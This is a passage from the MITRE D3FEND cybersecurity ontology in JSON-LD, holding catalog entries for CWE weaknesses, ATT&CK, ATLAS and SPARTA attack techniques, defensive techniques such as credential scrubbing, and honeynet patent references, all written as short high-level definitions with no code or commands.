      "d3f:kb-abstract": "Techniques for synchronizing a honey network configuration to reflect a target network environment are disclosed. In some embodiments, a system for synchronizing a honey network configuration to reflect a target network environment includes a device profile data store that includes a plurality of attributes of each of a plurality of devices in the target network environment; a virtual machine (VM) image library that includes one or more VM images; and a virtual clone manager executed on a processor that instantiates a virtual clone of one or more devices in the target enterprise network using a VM image selected from the VM image library that is customized based on one or more attributes for a target device in the device profile data store.",
      "d3f:kb-author": "Taylor Ettema, Huagang Xie",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Palo Alto Networks Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:IntegratedHoneynet"
      },
      "d3f:kb-reference-title": "Synchronizing a honey network configuration to reflect a target network environment",
      "rdfs:label": "Reference - Synchronizing a honey network configuration to reflect a target network environment - Palo Alto Networks Inc"
    },
    {
      "@id": "d3f:CWE-343",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-343",
      "d3f:definition": "The product's random number generator produces a series of values which, when observed, can be used to infer a relatively small range of possibilities for the next value that could be generated.",
      "rdfs:label": "Predictable Value Range from Previous Values",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-340"
      }
    },
    {
      "@id": "d3f:AML.T0007",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0007",
      "d3f:definition": "Adversaries may search private sources to identify AI learning artifacts that exist on the system and gather information about them.\nThese artifacts can include the software stack used to train and deploy models, training and testing data management systems, container registries, software repositories, and model zoos.\n\nThis information can be used to identify targets for further collection, exfiltration, or disruption, and to tailor and improve attacks.",
      "rdfs:label": "Discover AI Artifacts - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0007"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASDiscoveryTechnique"
      },
      "skos:prefLabel": "Discover AI Artifacts"
    },
    {
      "@id": "d3f:NTFSLink",
      "@type": "owl:Class",
      "d3f:definition": "The NTFS filesystem defines various ways to link files, i.e. to make a file point to another file or its contents. The object being pointed to is called the target. There are three classes of NTFS links: (a) Hard links, which have files share the same MFT entry (inode), in the same filesystem; (b) Symbolic links, which record the path of another file that the links contents should show and can accept relative paths; and (c) Junction points, which are similar to symlinks but defined only for directories and only accepts local absolute paths",
      "rdfs:label": "NTFS Link",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:File"
        },
        {
          "@id": "d3f:FileSystemLink"
        }
      ]
    },
    {
      "@id": "d3f:WatchdogTimerServiceEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event in which the watchdog timer is serviced (kicked/pet), extending the time until expiry.",
      "rdfs:label": "Watchdog Timer Service Event",
      "rdfs:subClassOf": {
        "@id": "d3f:WatchdogTimerEvent"
      }
    },
    {
      "@id": "d3f:CCI-000884_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization protects nonlocal maintenance sessions by employing organization-defined authenticators that are replay resistant.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:CredentialHardening"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-18T00:00:00"
      },
      "rdfs:label": "CCI-000884"
    },
    {
      "@id": "d3f:LinearLogicProgramming",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-LLP",
      "d3f:definition": "Linear logic programming is a form of logic programming that uses linear logic, that is, it emphasizes the use of formulas as resources.",
      "d3f:kb-article": "## References\n1. Cosmo, R. and Miller D. (2019, May 24). _Linear logic_. Stanford Encyclopedia of Philosophy. [Link](https://plato.stanford.edu/entries/logic-linear/#LinLogComSci)\n2. Linear logic programming. (2023, May 16). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Logic_programming#Linear_logic_programming)",
      "rdfs:label": "Linear Logic Programming",
      "rdfs:subClassOf": {
        "@id": "d3f:LogicProgramming"
      }
    },
    {
      "@id": "d3f:terminates",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x terminates y: The technique x brings to an end or halt to some activity y.",
      "d3f:synonym": "aborts",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00353480-v"
      },
      "rdfs:label": "terminates",
      "rdfs:seeAlso": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00354493-v"
      },
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:evicts"
        }
      ]
    },
    {
      "@id": "d3f:resumes",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x resumes y: The agent or technique x continues a previous action on entity y. Usually occurs after suspension on y.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00350758-v"
      },
      "rdfs:label": "resumes",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:CWE-298",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-298",
      "d3f:definition": "A certificate expiration is not validated or is incorrectly validated, so trust may be assigned to certificates that have been abandoned due to age.",
      "rdfs:label": "Improper Validation of Certificate Expiration",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-295"
        },
        {
          "@id": "d3f:CWE-672"
        }
      ]
    },
    {
      "@id": "d3f:CWE-467",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-467",
      "d3f:definition": "The code calls sizeof() on a pointer type, which can be an incorrect calculation if the programmer intended to determine the size of the data that is being pointed to.",
      "rdfs:label": "Use of sizeof() on a Pointer Type",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-131"
      }
    },
    {
      "@id": "d3f:DE-0012",
      "@type": "owl:Class",
      "d3f:attack-id": "DE-0012",
      "d3f:definition": "This technique involves two or more compromised components operating in coordination to conceal malicious activity. Threat actors compromise multiple software modules during the supply chain process and design them to behave cooperatively. Each component independently performs only a limited, seemingly benign function, such that when analyzed in isolation, no single module appears malicious. An example of implementation involves one component acting as a trigger agent, waiting for specific mission or system conditions (e.g., GPS fix, telemetry state) and writing a signal to a shared resource (e.g., file, bus). A separate action agent monitors this resource and only executes the malicious behavior (such as data exfiltration or command injection) upon receiving the trigger.\nThis division of responsibilities significantly undermines traditional detection techniques, such as log analysis, static code review, or heuristic-based behavior monitoring.",
      "rdfs:label": "Component Collusion - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0012/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTADefenseEvasionTechnique"
      },
      "skos:prefLabel": "Component Collusion"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_CM-5_3",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Access Restrictions for Change | Signed Components",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:LocalAccountMonitoring"
        },
        {
          "@id": "d3f:SystemConfigurationPermissions"
        }
      ],
      "rdfs:label": "CM-5(3)"
    },
    {
      "@id": "d3f:CWE-94",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-94",
      "d3f:definition": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.",
      "d3f:may-be-weakness-of": [
        {
          "@id": "d3f:EvalFunction"
        },
        {
          "@id": "d3f:UserInputFunction"
        }
      ],
      "d3f:synonym": "Code Injection",
      "rdfs:label": "Improper Control of Generation of Code ('Code Injection')",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-74"
        },
        {
          "@id": "d3f:CWE-913"
        },
        {
          "@id": "_:N975bac63a90e4033a444d1c3c284c8bf"
        },
        {
          "@id": "_:N00dbe4245f9c4ceeb60c2577f9d05b60"
        }
      ]
    },
    {
      "@id": "_:N975bac63a90e4033a444d1c3c284c8bf",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-be-weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EvalFunction"
      }
    },
    {
      "@id": "_:N00dbe4245f9c4ceeb60c2577f9d05b60",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-be-weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserInputFunction"
      }
    },
    {
      "@id": "d3f:CCI-002422_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system maintains the confidentiality and/or integrity of information during reception.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:EncryptedTunnels"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002422"
    },
    {
      "@id": "d3f:TimerSetEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event in which a software timer is initialized with a specific duration or expiration time.",
      "rdfs:label": "Timer Set Event",
      "rdfs:subClassOf": {
        "@id": "d3f:SoftwareTimerEvent"
      }
    },
    {
      "@id": "d3f:Transformer-basedLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-TBL",
      "d3f:definition": "A transformer is a deep learning model. It is distinguished by its adoption of self-attention, differentially weighting the significance of each part of the input (which includes the recursive output) data.",
      "d3f:kb-article": "## References\n\"Transformer (machine learning model).\" Wikipedia. [Link](https://en.wikipedia.org/wiki/Transformer_(machine_learning_model)).",
      "rdfs:label": "Transformer-based Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:MachineLearning"
      }
    },
    {
      "@id": "d3f:CWE-407",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-407",
      "d3f:definition": "An algorithm in a product has an inefficient worst-case computational complexity that may be detrimental to system performance and can be triggered by an attacker, typically using crafted manipulations that ensure that the worst case is being reached.",
      "d3f:synonym": "Quadratic Complexity",
      "rdfs:label": "Inefficient Algorithmic Complexity",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-405"
      }
    },
    {
      "@id": "d3f:TA0010",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:definition": "The adversary is trying to steal data.\n\nExfiltration consists of techniques that adversaries may use to steal data from your network. Once they've collected data, adversaries often package it to avoid detection while removing it. This can include compression and encryption. Techniques for getting data out of a target network typically include transferring it over their command and control channel or an alternate channel and may also include putting size limits on the transmission.",
      "d3f:display-order": 11,
      "rdfs:label": "Exfiltration",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ]
    },
    {
      "@id": "d3f:OTRunCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Commands a device to start or resume a service/program.",
      "rdfs:label": "OT Run Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyDeviceOperatingModeCommandEvent"
        },
        {
          "@id": "_:Nd8e76e8fa23e401484d9d67665750910"
        },
        {
          "@id": "_:Nb1168d7cf1604c718f5aa00b3bfc2c5e"
        }
      ]
    },
    {
      "@id": "_:Nd8e76e8fa23e401484d9d67665750910",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControllerOperatingMode"
      }
    },
    {
      "@id": "_:Nb1168d7cf1604c718f5aa00b3bfc2c5e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTRunCommand"
      }
    },
    {
      "@id": "d3f:IMP-0002",
      "@type": "owl:Class",
      "d3f:attack-id": "IMP-0002",
      "d3f:definition": "Measures designed to temporarily impair the use or access to a system for a period of time. Threat actors may seek to disrupt communications from the victim spacecraft to the ground controllers or other interested parties. By disrupting communications during critical times, there is the potential impact of data being lost or critical actions not being performed. This could cause the spacecraft's purpose to be put into jeopardy depending on what communications were lost during the disruption. This behavior is different than Denial as this attack can also attempt to modify the data and messages as they are passed as a way to disrupt communications.",
      "rdfs:label": "Disruption - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IMP-0002/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAImpactTechnique"
      },
      "skos:prefLabel": "Disruption"
    },
    {
      "@id": "d3f:Model-basedValueIteration",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-MBVI",
      "d3f:definition": "Value Iteration effectively reducesthe evaluation stage down to a single sweep of the states. Additionally, to improve things further, it combines the Policy Evaluation and Policy Improvement stages into a single update.",
      "d3f:kb-article": "## References\nPolicy and Value Iteration. Towards Data Science.  [Link](https://towardsdatascience.com/policy-and-value-iteration-78501afb41d2).",
      "d3f:synonym": "MBVI",
      "rdfs:label": "Model-based Value Iteration",
      "rdfs:subClassOf": {
        "@id": "d3f:Model-basedReinforcementLearning"
      }
    },
    {
      "@id": "d3f:EX-0017",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0017",
      "d3f:definition": "The adversary inflicts damage by physically striking space assets or their supporting elements, producing irreversible effects that are generally visible to space situational awareness. Kinetic attacks in orbit are commonly grouped into direct-ascent engagements, launched from Earth to intercept a target on a specific pass, and co-orbital engagements, in which an on-orbit vehicle maneuvers to collide with or detonate near the target. Outcomes include structural breakup, loss of attitude control, sensor or antenna destruction, and wholesale mission termination; secondary effects include debris creation whose persistence depends on altitude and geometry. Because launches and on-orbit collisions are measurable, these actions tend to be more attributable and offer near–real-time confirmation of effect compared to non-kinetic methods.",
      "rdfs:label": "Kinetic Physical Attack - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0017/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAExecutionTechnique"
      },
      "skos:prefLabel": "Kinetic Physical Attack"
    },
    {
      "@id": "d3f:Reference-FirewallForProcessingConnection-orientedAndConnectionlessDatagramsOverAConnection-orientedNetwork_NationalSecurityAgency",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US6615358B1"
      },
      "d3f:kb-abstract": "The present invention is a device for and method of accessing an information network by initializing a database, an ATM approved list, an IP approved list, and an IP disapproved list; receiving a datagram; discarding the datagram if it is not on the ATM approved list; determining the datagram's type; allowing access to the network and comparing the connection request, if any, to the database if the datagram is ATM signaling; discarding the datagram if the datagram is ATM signaling and the database denies the request; adding the request to the ATM approved list if the datagram is ATM signaling and the database allows the request; allowing access to the network if the datagram is ATM data that excludes IP data and the request is on the ATM approved list; computing a flow tag if the datagram is ATM data that includes IP data; discarding the datagram if the flow tag is on the IP disapproved list; allowing access to the network if the flow tag is on the IP approved list; comparing the flow tag to the database if the flow tag is neither on the IP approved list nor on the IP disapproved list; discarding the datagram and adding the flow tag to the IP disapproved list if the database rejects the flow tag; and allowing access to the network and adding the flow tag to the corresponding approved list if the database accepts the flow tag; and performing these steps on the next datagram",
      "d3f:kb-author": "Patrick W. Dowd, John T. McHenry",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "National Security Agency",
      "d3f:kb-reference-of": {
        "@id": "d3f:InboundTrafficFiltering"
      },
      "d3f:kb-reference-title": "Firewall for processing connection-oriented and connectionless datagrams over a connection-oriented network",
      "rdfs:label": "Reference - Firewall for processing connection-oriented and connectionless datagrams over a connection-oriented network - National Security Agency"
    },
    {
      "@id": "d3f:may-have-weakness",
      "@type": "owl:ObjectProperty",
      "rdfs:domain": {
        "@id": "d3f:Artifact"
      },
      "rdfs:label": "may-have-weakness",
      "rdfs:range": {
        "@id": "d3f:Weakness"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:T1557.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1557.003",
      "d3f:creates": {
        "@id": "d3f:DHCPNetworkTraffic"
      },
      "d3f:definition": "Adversaries may redirect network traffic to adversary-owned systems by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting as a malicious DHCP server on the victim network. By achieving the adversary-in-the-middle (AiTM) position, adversaries may collect network communications, including passed credentials, especially those sent over insecure, unencrypted protocols. This may also enable follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002).",
      "rdfs:label": "DHCP Spoofing",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1557"
        },
        {
          "@id": "_:N502c1e6e60fa4182b9ec2554b54e780c"
        }
      ]
    },
    {
      "@id": "_:N502c1e6e60fa4182b9ec2554b54e780c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DHCPNetworkTraffic"
      }
    },
    {
      "@id": "d3f:CredentialScrubbing",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:CredentialScrubbing"
      ],
      "d3f:d3fend-id": "D3-CS",
      "d3f:definition": "The systematic removal of hard-coded credentials from source code to prevent accidental exposure and unauthorized access.",
      "d3f:hardens": {
        "@id": "d3f:Subroutine"
      },
      "d3f:kb-article": "## How it Works\nCredential Scrubbing involves identifying and eliminating hard-coded credentials such as usernames, passwords, API keys, and tokens from source code repositories. These credentials should be managed securely using environment variables, secret management tools, or secure vaults where they can be safely accessed when needed.\n\n## Considerations\n* Developers should conduct regular audits of source code to ensure credentials are not hard-coded.\n* Exposed credentials found in version control history must be disabled and replaced promptly.\n* Adopt role-based access controls and credential rotation policies to minimize security risks.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SecretsManagementCheatSheet-OWASP"
      },
      "rdfs:label": "Credential Scrubbing",
      "rdfs:seeAlso": [
        {
          "@id": "d3f:CWE-798"
        },
        {
          "@id": "https://capec.mitre.org/data/definitions/191.html"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SourceCodeHardening"
        },
        {
          "@id": "_:N9754c60e6ce44179b2d1dbdecf6bacb2"
        }
      ]
    },
    {
      "@id": "_:N9754c60e6ce44179b2d1dbdecf6bacb2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:hardens"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Subroutine"
      }
    },
    {
      "@id": "d3f:CredentialHardening",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:CredentialHardening"
      ],
      "d3f:d3fend-id": "D3-CH",
      "d3f:definition": "Credential Hardening techniques modify system or network properties in order to protect system or network/domain credentials.",
      "d3f:enables": {
        "@id": "d3f:Harden"
      },
      "d3f:hardens": {
        "@id": "d3f:Credential"
      },
      "rdfs:label": "Credential Hardening",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:N15960fb5ec7f4d4fa7294f2a4fe98c41"
        },
        {
          "@id": "_:Nacc30899b2ef470989e85f94e6f35cab"
        }
      ]
    },
    {
      "@id": "_:N15960fb5ec7f4d4fa7294f2a4fe98c41",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Harden"
      }
    },
    {
      "@id": "_:Nacc30899b2ef470989e85f94e6f35cab",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:hardens"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Credential"
      }
    },
    {
      "@id": "d3f:operates",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x operates y: The entity x enables, activates, or controls the functioning or behavior of object y (operated entity), typically in accordance with the design or intended use of the operated entity.",
      "rdfs:isDefinedBy": "oewn-01513459-v",
      "rdfs:label": "operates",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:AML.T0091.000",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0091.000",
      "d3f:definition": "Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users or services and used in lieu of login credentials.\n\nApplication access tokens are used to make authorized API requests on behalf of a user or service and are commonly used to access resources in cloud, container-based applications, and software-as-a-service (SaaS). They are commonly used for AI services such as chatbots, LLMs, and predictive inference APIs.",
      "rdfs:label": "Application Access Token - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0091.000"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0091"
      },
      "skos:prefLabel": "Application Access Token"
    },
    {
      "@id": "d3f:T1045",
      "@type": "owl:Class",
      "d3f:attack-id": "T1045",
      "d3f:definition": "Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1027.002",
      "rdfs:label": "Software Packing",
      "rdfs:seeAlso": {
        "@id": "d3f:T1027.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:ServiceBinaryVerification",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ServiceBinaryVerification"
      ],
      "d3f:d3fend-id": "D3-SBV",
      "d3f:definition": "Analyzing changes in service binary files by comparing to a source of truth.",
      "d3f:kb-article": "## How it works\nSystem service applications may originate from the operating system installation or third-party applications installed with administrative privileges. These services have an entry point of some executable file-- a binary or a script. Attackers sometimes modify these executables to launch their own code. Analyzing changes in these files may uncover unauthorized activity.\n\n## Considerations\n* These files change for legitimate reasons when the system or software updates.\n* The source of truth must not be corrupted in order for this method to work.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-ServiceBinaryModifications_MITRE"
      },
      "d3f:verifies": {
        "@id": "d3f:ServiceApplication"
      },
      "rdfs:label": "Service Binary Verification",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemFileAnalysis"
        },
        {
          "@id": "_:N86a65ed3ab4c48b4a921c29e4cf8857d"
        }
      ]
    },
    {
      "@id": "_:N86a65ed3ab4c48b4a921c29e4cf8857d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:verifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ServiceApplication"
      }
    },
    {
      "@id": "d3f:T1132.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1132.001",
      "d3f:definition": "Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.(Citation: Wikipedia Binary-to-text Encoding)(Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.",
      "rdfs:label": "Standard Encoding",
      "rdfs:subClassOf": {
        "@id": "d3f:T1132"
      }
    },
    {
      "@id": "d3f:SymmetricFeature-basedTransferLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SFTL",
      "d3f:definition": "Homogeneous symmetric transformation takes both the source feature space Xs and target feature space Xt and learns feature transformations as to project each onto a common subspace Xc for adaptation purposes. This derived subspace becomes a domain-invariant feature subspace to associate cross-domain data, and in effect, reduces marginal distribution differences.",
      "d3f:kb-article": "## References\nDay, O., & Khoshgoftaar, T.M. (2017). A survey on heterogeneous transfer learning. *Journal of Big Data, 4*(1), 29. [Link](https://doi.org/10.1186/s40537-017-0089-0).",
      "rdfs:label": "Symmetric Feature-based Transfer Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:HomogenousTransferLearning"
      }
    },
    {
      "@id": "d3f:ContentExcision",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ContentExcision"
      ],
      "d3f:d3fend-id": "D3-CNE",
      "d3f:definition": "Removing specific, potentially malicious, parts of content",
      "d3f:kb-article": "## How it works\n\nIf malicious or unecessary elements is discovered within the content, or if a specific embedded portion does not comply with policy, it may be removed to ensure safety.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-MethodForContentDisarmandReconstruction_OPSWATInc"
      },
      "rdfs:label": "Content Excision",
      "rdfs:subClassOf": {
        "@id": "d3f:ContentModification"
      }
    },
    {
      "@id": "d3f:Reference-DynamicSelectionAndGenerationOfAVirtualCloneForDetonationOfSuspiciousContentWithinAHoneyNetwork_PaloAltoNetworksInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US9882929B1/en?oq=US-9882929-B1"
      },
      "d3f:kb-abstract": "Techniques for dynamic selection and generation of detonation location of suspicious content with a honey network are disclosed. In some embodiments, a system for dynamic selection and generation of detonation location of suspicious content with a honey network includes a virtual machine (VM) instance manager that manages a plurality of virtual clones executed in an instrumented VM environment, in which the plurality of virtual clones executed in the instrumented VM environment correspond to the honey network that emulates a plurality of devices in an enterprise network; and an intelligent malware detonator that detonates a malware sample in at least one of the plurality of virtual clones executed in the instrumented VM environment.",
      "d3f:kb-author": "Taylor Ettema; Huagang Xie",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Palo Alto Networks Inc",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:DecoyNetworkResource"
        },
        {
          "@id": "d3f:StandaloneHoneynet"
        }
      ],
      "d3f:kb-reference-title": "Dynamic selection and generation of a virtual clone for detonation of suspicious content within a honey network",
      "rdfs:label": "Reference - Dynamic selection and generation of a virtual clone for detonation of suspicious content within a honey network - Palo Alto Networks Inc"
    },
    {
      "@id": "d3f:may-be-detected-by",
      "@type": "owl:ObjectProperty",
      "d3f:pref-label": "may be detected by",
      "owl:inverseOf": {
        "@id": "d3f:may-detect"
      },
      "rdfs:label": "may-be-detected-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:attack-may-be-countered-by"
      }
    },
    {
      "@id": "d3f:quarantines",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x quarantines y: Technique x moves entity y to a place of isolation.",
      "rdfs:label": "quarantines",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:Reference-MicrosoftControlFlowGuard",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://learn.microsoft.com/en-us/windows/win32/secbp/control-flow-guard"
      },
      "d3f:kb-organization": "Microsoft",
      "d3f:kb-reference-of": {
        "@id": "d3f:ControlFlowIntegrity"
      },
      "d3f:kb-reference-title": "Control Flow Guard for platform security",
      "rdfs:label": "Reference - Control Flow Guard (CFG) - Microsoft"
    },
    {
      "@id": "d3f:Planning",
      "@type": "owl:Class",
      "rdfs:label": "Planning",
      "rdfs:subClassOf": {
        "@id": "d3f:AnalyticalPurpose"
      }
    },
    {
      "@id": "d3f:AML.T0048.003",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0048.003",
      "d3f:definition": "User harms may encompass a variety of harm types including financial and reputational that are directed at or felt by individual victims of the attack rather than at the organization level.",
      "rdfs:label": "User Harm - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0048.003"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0048"
      },
      "skos:prefLabel": "User Harm"
    },
    {
      "@id": "d3f:CWE-1120",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1120",
      "d3f:definition": "The code is too complex, as calculated using a well-defined, quantitative measure.",
      "rdfs:label": "Excessive Code Complexity",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:PER-0002.02",
      "@type": "owl:Class",
      "d3f:attack-id": "PER-0002.02",
      "d3f:definition": "Software backdoors are code paths intentionally crafted or later inserted to provide privileged functionality on cue. In flight contexts, they appear as hidden command handlers, alternate authentication checks, special user/role constructs, or procedure/script hooks that accept nonpublic inputs. They can be embedded in flight applications, separation kernels or drivers, gateway processors that translate bus/payload traffic, or update/loader utilities that handle tables and images. SDR configurations offer another avenue: non-public waveforms, subcarriers, or framing profiles that, when selected, expose a private command channel. Activation is often conditional, specific timetags, geometry, message sequences, or file names, to keep the feature dormant during routine testing and operations. Once present, the backdoor provides a repeatable way to execute commands or modify state without traversing the standard control surfaces, sustaining the adversary’s access over time.",
      "rdfs:label": "Software Backdoor - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/PER-0002/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PER-0002"
      },
      "skos:prefLabel": "Software Backdoor"
    },
    {
      "@id": "d3f:CWE-52",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-52",
      "d3f:definition": "The product accepts path input in the form of multiple trailing slash ('/multiple/trailing/slash//') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.",
      "rdfs:label": "Path Equivalence: '/multiple/trailing/slash//'",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-163"
        },
        {
          "@id": "d3f:CWE-41"
        }
      ]
    },
    {
      "@id": "d3f:T0835",
      "@type": "owl:Class",
      "d3f:attack-id": "T0835",
